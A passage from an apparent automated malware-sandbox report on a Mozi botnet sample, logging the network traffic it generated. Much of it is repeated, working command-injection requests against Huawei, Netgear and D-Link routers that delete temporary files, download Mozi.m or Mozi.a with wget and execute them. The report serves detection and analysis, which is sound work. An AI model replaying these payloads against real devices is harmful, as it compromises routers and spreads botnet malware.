huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.220.190.54:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 174.218.188.147:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 124.135.189.229:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 192.29.166.251:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 12.20.220.160:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.7.107.103:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 98.60.171.113:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: /tmp/bin.sh.elf (PID: 6241)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6259)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6263)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6255)Socket: 0.0.0.0:49999Jump to behavior
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                            Source: unknownTCP traffic detected without corresponding DNS query: 118.175.124.25
                            Source: unknownTCP traffic detected without corresponding DNS query: 39.116.5.135
                            Source: unknownTCP traffic detected without corresponding DNS query: 169.40.164.181
                            Source: unknownTCP traffic detected without corresponding DNS query: 43.79.133.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 86.51.139.199
